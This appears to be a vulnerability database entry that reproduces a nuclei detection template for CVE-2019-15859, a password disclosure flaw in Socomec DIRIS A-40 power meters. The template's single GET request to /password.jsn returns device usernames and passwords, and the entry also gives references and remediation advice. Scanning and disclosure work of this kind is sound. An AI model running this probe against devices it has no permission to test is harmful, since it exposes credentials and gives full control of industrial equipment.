
Socomec DIRIS A-40 Devices Password Disclosure

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Socomec DIRIS A-40 Devices Password Disclosure, vulnerability in web interface allowing remote acces

Related

Reporter | Title | Published
CNVD | Socomec DIRIS A-40 Password Disclosure Vulnerability | 14 Oct 2019 00:00
CVE | CVE-2019-15859 | 9 Oct 2019 15:04
Cvelist | CVE-2019-15859 | 9 Oct 2019 15:04
NVD | CVE-2019-15859 | 9 Oct 2019 16:15
OSV | CVE-2019-15859 | 9 Oct 2019 16:15
Packet Storm | Socomec DIRIS A-40 Password Disclosure | 8 Oct 2019 00:00
Prion | Cross site scripting | 9 Oct 2019 16:15
RedhatCVE | CVE-2019-15859 | 22 May 2025 04:37

id: CVE-2019-15859

info:
  name: Socomec DIRIS A-40 Devices Password Disclosure
  author: geeknik
  severity: critical
  description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
  impact: |
    An attacker can obtain sensitive information such as passwords, leading to unauthorized access.
  remediation: |
    Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2019/Oct/10
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15859
    - http://packetstormsecurity.com/files/154764/Socomec-DIRIS-A-40-Password-Disclosure.html
    - https://www.socomec.com/single-circuit-multifunction-meters_en.html
    - http://seclists.org/fulldisclosure/2019/Oct/10
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-15859
    cwe-id: CWE-200
    epss-score: 0.34113
    epss-percentile: 0.98197
    cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: socomec
    product: diris_a-40_firmware
  tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/password.jsn"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/json"

      - type: word
        part: body
        words:
          - "username"
          - "password"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cf1b335f9855ca25d7126e09eb9a526695f2a813a151af9df81ff90afd8e6de2022061593d2b5b3f9e313956a67cf26b726d223e6335eed3bd530f165b23d3cebeb1:922c64590222798bb761d5b6d8e72950


04 Feb 2026 07:00 (current)
Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 9.8
CVSS 2: 10
EPSS: 0.34113